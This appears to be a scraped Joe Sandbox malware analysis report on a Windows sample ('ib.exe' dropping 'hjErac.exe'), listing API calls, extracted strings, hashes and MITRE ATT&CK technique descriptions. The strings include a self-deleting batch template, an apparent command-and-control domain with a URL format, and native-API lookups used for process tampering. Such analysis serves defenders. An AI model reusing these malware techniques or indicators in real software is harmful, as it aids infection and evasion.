CloseHandle.KERNEL32(00000000), ref: 00CB1612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00CB162D

Strings

C:\Users\user\AppData\Local\Temp\, xrefs: 00CB1599
C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB158A, 00CB15B3, 00CB15B8, 00CB15B9
open, xrefs: 00CB1627
%s%.8x.bat, xrefs: 00CB15A4
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00CB15C0

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user\AppData\Local\Temp\$C:\Users\user\AppData\Local\Temp\hjErac.exe$open
API String ID: 617340118-2706779844
Opcode ID: ed3c7719802302263b30dcf99a0435af2f22e9f7e76217281bc42f577e6a185c
Instruction ID: 9bb05b38029783a06de1c31e4450c1a6fd82a64a554281e131b2a6b5d370652b
Opcode Fuzzy Hash: ed3c7719802302263b30dcf99a0435af2f22e9f7e76217281bc42f577e6a185c
Instruction Fuzzy Hash: A7115172A411687AD72097A8AC89FEF7B7CDF59750F000161F959E3051EA70AF848BB0

Function 00CB120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00CB1400), ref: 00CB1226
GetProcAddress.KERNEL32(00000000), ref: 00CB122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00CB1400), ref: 00CB123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00CB1400), ref: 00CB1250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user\AppData\Local\Temp\hjErac.exe,?,?,?,?,00CB1400), ref: 00CB129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user\AppData\Local\Temp\hjErac.exe,?,?,?,?,00CB1400), ref: 00CB12B0
CloseHandle.KERNEL32(?,?,C:\Users\user\AppData\Local\Temp\hjErac.exe,?,?,?,?,00CB1400), ref: 00CB12F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00CB1400), ref: 00CB130A

Strings

ntdll.dll, xrefs: 00CB1219
C:\Users\user\AppData\Local\Temp\hjErac.exe, xrefs: 00CB1262
ZwQuerySystemInformation, xrefs: 00CB1212

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user\AppData\Local\Temp\hjErac.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-1605623530
Opcode ID: e19b01afa5e3d69d7e20a0ca36b0238018307c4885e8aba3c9111e7cf0a5b700
Instruction ID: a9c46880b542618aa2853314bb6b0be41ccf01b4ee14ab85c90400aba9710151
Opcode Fuzzy Hash: e19b01afa5e3d69d7e20a0ca36b0238018307c4885e8aba3c9111e7cf0a5b700
Instruction Fuzzy Hash: 23213671744351EBD720AF65DC18BAFBBA8FF85B10F880A18F945D6240D370DA40C7A6

Function 00CB185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON

Download Yara Rule

APIs

GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75BF8400,http://%s:%d/%s/%s,?,?,?,00CB1118), ref: 00CB1867
srand.MSVCRT ref: 00CB1878
rand.MSVCRT ref: 00CB1880
srand.MSVCRT ref: 00CB1890
rand.MSVCRT ref: 00CB1894

Strings

http://%s:%d/%s/%s, xrefs: 00CB1860
ddos.dnsnb8.net, xrefs: 00CB1862

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: Timerandsrand$FileSystem
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 4106363736-3273462101
Opcode ID: 836d0cd13c5e3490266264c167ceba36a060315a6fda7b4adfc974f0c067a265
Instruction ID: d624569ce82b67a33301b371810bac59d33797738cc8a63e2723ad7063375608
Opcode Fuzzy Hash: 836d0cd13c5e3490266264c167ceba36a060315a6fda7b4adfc974f0c067a265
Instruction Fuzzy Hash: B0E01277A14218BBDB00A7A9FC46A9EBBACDE84161F110666F600D3254E974F9448AB4

Function 00CB2692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,74DEE800,?,?,00CB29DB,?,00000001), ref: 00CB26A7
WaitForSingleObject.KERNEL32(00000000,000000FF,74DEE800,?,?,00CB29DB,?,00000001), ref: 00CB26B5
lstrlen.KERNEL32(?), ref: 00CB26C4
??2@YAPAXI@Z.MSVCRT(-00000005), ref: 00CB26CE
lstrcpy.KERNEL32(00000004,?), ref: 00CB26E3
lstrcpy.KERNEL32(?,00000004), ref: 00CB271F
??3@YAXPAX@Z.MSVCRT(00000000), ref: 00CB272D
SetEvent.KERNEL32 ref: 00CB273C

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
String ID:
API String ID: 41106472-0
Opcode ID: d5d349e8014c9c57648bbf9de24c812d1579323b2dda9f047000bda67611664c
Instruction ID: c23e44461d2a3de4dd780dc5ac46caf1d0a72b779952ada9c11df98a599cb076
Opcode Fuzzy Hash: d5d349e8014c9c57648bbf9de24c812d1579323b2dda9f047000bda67611664c
Instruction Fuzzy Hash: EC119035508160EFCB21AF25EC48B9FBBA9FF84721F104216F85497121DB309A86DB50

Function 00CB1B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON

Download Yara Rule

APIs

srand.MSVCRT ref: 00CB1BCD
rand.MSVCRT ref: 00CB1BD8
memset.MSVCRT ref: 00CB1C43
memcpy.MSVCRT(?,zjQXcAMKSaXuZyWgIuBVbOKpWQVNLHUCntxleJhiHMrDxiEfpXhcujwDvPWNRCVqFizSqolEPkfESdpMrhmqRDIskYvZKYjyUsoxIvRaHwwNfCTbkBcJGsTtbtZrgemlLFGzPeJndOAaTOndULAyGYQgmBoF,00000006,?,00000000,00000040,?,00000000,00000000,?,00000000,00000002), ref: 00CB1C4F
lstrcat.KERNEL32(?,.exe), ref: 00CB1C5D

Strings

zjQXcAMKSaXuZyWgIuBVbOKpWQVNLHUCntxleJhiHMrDxiEfpXhcujwDvPWNRCVqFizSqolEPkfESdpMrhmqRDIskYvZKYjyUsoxIvRaHwwNfCTbkBcJGsTtbtZrgemlLFGzPeJndOAaTOndULAyGYQgmBoF, xrefs: 00CB1B8A, 00CB1B9C, 00CB1C15, 00CB1C49
.exe, xrefs: 00CB1C57

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: lstrcatmemcpymemsetrandsrand
String ID: .exe$zjQXcAMKSaXuZyWgIuBVbOKpWQVNLHUCntxleJhiHMrDxiEfpXhcujwDvPWNRCVqFizSqolEPkfESdpMrhmqRDIskYvZKYjyUsoxIvRaHwwNfCTbkBcJGsTtbtZrgemlLFGzPeJndOAaTOndULAyGYQgmBoF
API String ID: 122620767-4250208734
Opcode ID: 871c8582f599f3145d1f86c25ae2e5d38f920de7db04ba3c6ecf5834ae3289ee
Instruction ID: ff3b6dc60f09fff6172f9b83c7a0fa099800091d932ba87e3af4c083acdcfabe
Opcode Fuzzy Hash: 871c8582f599f3145d1f86c25ae2e5d38f920de7db04ba3c6ecf5834ae3289ee
Instruction Fuzzy Hash: D9218E32F481E06FE71A1335BC60BEE3F44DFA3B11F1D01A9FE950B193D1640A828260

Function 00CB189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00CB18B1
CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,74DF0F00,75BF8400), ref: 00CB18D3
CloseHandle.KERNEL32(00CB2549), ref: 00CB18E9
WaitForSingleObject.KERNEL32(?,000000FF), ref: 00CB18F0
GetExitCodeProcess.KERNEL32(?,00CB2549), ref: 00CB1901
CloseHandle.KERNEL32(?), ref: 00CB190A

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
String ID:
API String ID: 876959470-0
Opcode ID: 8d5b489ee62d1dfe260636e57c965dfe2b5371067c3f5a664ba28f13f48603e8
Instruction ID: f8c29177fc85138fc36f4e858ec76fa38d8fbf2e453770a26b94ad7d4d9e66e5
Opcode Fuzzy Hash: 8d5b489ee62d1dfe260636e57c965dfe2b5371067c3f5a664ba28f13f48603e8
Instruction Fuzzy Hash: 1A018F72901168BBCB21ABD6EC48EDFBF3DFF85770F104121FA15A51A0D6315A18CBA0

Function 00CB1319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00CB1334
GetProcAddress.KERNEL32(00000000), ref: 00CB133B
memset.MSVCRT ref: 00CB1359

Strings

ntdll.dll, xrefs: 00CB132F
NtSystemDebugControl, xrefs: 00CB132A

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: AddressHandleModuleProcmemset
String ID: NtSystemDebugControl$ntdll.dll
API String ID: 3137504439-2438149413
Opcode ID: 87f07c0cc8d71cd192965888f5803709d6c7e7ac48b38c6141efad1e49a68642
Instruction ID: 2a203f91b3f0e85099be2dd1be5bcad457e0e6e080603c5b0066ff0c6f7d94fa
Opcode Fuzzy Hash: 87f07c0cc8d71cd192965888f5803709d6c7e7ac48b38c6141efad1e49a68642
Instruction Fuzzy Hash: 0C016D71A04309AFDB10DF99AC85AAFBBACFB51314F44422AF912A2151E2709605CA51

Function 00CB1DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON

Download Yara Rule

APIs

strrchr.MSVCRT ref: 00CB1E0B
lstrcpy.KERNEL32(?,00000001), ref: 00CB1E1C
strrchr.MSVCRT ref: 00CB1E2B
lstrcmpiA.KERNEL32(?,00CB4488), ref: 00CB1E48
lstrlen.KERNEL32(00CB4488), ref: 00CB1E53

Memory Dump Source

Source File: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: strrchr$lstrcmpilstrcpylstrlen
String ID:
API String ID: 3636361484-0
Opcode ID: 89e26cb7f568602f871c19376fe85cc725a2e9199f99d457224b3e387b49f0fc
Instruction ID: 5fda34a2d8b1aafe3b09cb28518a11395d4bec999257d45efb02093c85985ea6
Opcode Fuzzy Hash: 89e26cb7f568602f871c19376fe85cc725a2e9199f99d457224b3e387b49f0fc
Instruction Fuzzy Hash: 9301AEB29082556FDF106760EC4DBDA77DCDF05351F540066DD45D3090D674EF848BA0

Function 00CB6014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00CB603C
GetProcAddress.KERNEL32(00000000,00CB6064), ref: 00CB604F

Strings

kernel32.dll, xrefs: 00CB603B

Memory Dump Source

Source File: 00000002.00000002.1888907189.0000000000CB6000.00000040.00000001.01000000.00000004.sdmp, Offset: 00CB0000, based on PE: true

Associated: 00000002.00000002.1888855783.0000000000CB0000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888867701.0000000000CB1000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888879896.0000000000CB3000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000002.00000002.1888893237.0000000000CB4000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_2_2_cb0000_hjErac.jbxd

Similarity

API ID: AddressHandleModuleProc
String ID: kernel32.dll
API String ID: 1646373207-1793498882
Opcode ID: d5a2100cbc41b4bdecec5b080981ecc3d6b049fefa482cd486ccbff9f8765e79
Instruction ID: 78e63074d49b89a659cc024c2e9d0fff188706d9e7c8b7e24e9f466a4d09553d
Opcode Fuzzy Hash: d5a2100cbc41b4bdecec5b080981ecc3d6b049fefa482cd486ccbff9f8765e79
Instruction Fuzzy Hash: 37F0F6B11442898FEF70CE64CC44BDE37E4EB05700F50443AE909CB241CB3886058B14

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify access tokens to operate under a different user or system security context to perform actions and bypass access controls. Windows uses access tokens to determine the ownership of a running process. A user can manipulate access tokens to make a running process appear as though it is the child of a different process or belongs to someone other than the user that started the process. When this occurs, the process also takes on the security context associated with the new token.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	Active Directory: Active Directory Object Modification, Command: Command Execution, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, User Account: User Account Metadata
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may deliver payloads to remote systems by adding content to shared storage locations, such as network drives or internal code repositories. Content stored on network drives or in other shared locations may be tainted by adding malicious programs, scripts, or exploit code to otherwise valid files. Once a user opens the shared tainted content, the malicious portion can be executed to run the adversary's code on a remote system. Adversaries may use tainted shared content to move laterally.
Tactics:	Lateral Movement
Data Sources:	File: File Creation, File: File Modification, Network Share: Network Share Access, Process: Process Creation
Platforms:	Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using a protocol and port pairing that are typically not associated. For example, HTTPS over port 8088or port 587as opposed to the traditional port 443. Adversaries may make changes to the standard port used by a protocol to bypass filtering or muddle analysis/parsing of network data.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report ib.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Yara Signatures

Memory Dumps

Sigma Signatures

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Compliance

Spreading

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Lowering of HIPS / PFW / Operating System Security Settings

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

Private

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Program Files (x86)\AutoIt3\Examples\Helpfile\Extras\MyProg.exe

C:\Program Files (x86)\AutoIt3\SciTE\SciTE.exe

C:\Program Files\7-Zip\Uninstall.exe

C:\ProgramData\Microsoft\Windows\WER\ReportQueue\AppCrash_hjErac.exe_b65444b1671fa348e7a4bd9321329eb10a53_61410b6e_7b740b91-304c-499d-98da-40c0ab07024e\Report.wer

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6DD7.tmp.dmp

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F01.tmp.WERInternalMetadata.xml

C:\ProgramData\Microsoft\Windows\WER\Temp\WER6F21.tmp.xml

C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\k1[1].rar

C:\Users\user\AppData\Local\Temp\1F7369D7.exe

C:\Users\user\AppData\Local\Temp\hjErac.exe

C:\Windows\appcompat\Programs\Amcache.hve

Static File Info

General

File Icon

Static PE Info

General

Windows Analysis Report
ib.exe

Function 003E9044 Relevance: 33.4, APIs: 4, Strings: 15, Instructions: 171
fileprocessCOMMON

Function 003E2510 Relevance: 30.0, APIs: 14, Strings: 3, Instructions: 262
threadsleepCOMMON

Function 003E2130 Relevance: 19.6, APIs: 13, Instructions: 114
networkCOMMON

Function 003E1B20 Relevance: 28.2, APIs: 11, Strings: 5, Instructions: 167
libraryloaderthreadCOMMON

Function 003E1459 Relevance: 24.6, APIs: 12, Strings: 2, Instructions: 58
windowsleepCOMMON

Function 003E1530 Relevance: 10.6, APIs: 5, Strings: 1, Instructions: 56
COMMON

Function 003E1160 Relevance: 7.6, APIs: 5, Instructions: 93
COMMON

Function 003E2000 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 10
synchronizationCOMMON

Function 003E1050 Relevance: 3.1, APIs: 2, Instructions: 70
sleepkeyboardCOMMON

Function 003E1DC0 Relevance: 3.1, APIs: 2, Instructions: 65
COMMON

Function 003E2100 Relevance: 1.3, APIs: 1, Instructions: 12
sleepCOMMON

Function 003E22C0 Relevance: 21.1, APIs: 9, Strings: 3, Instructions: 105
injectionmemorysynchronizationCOMMON

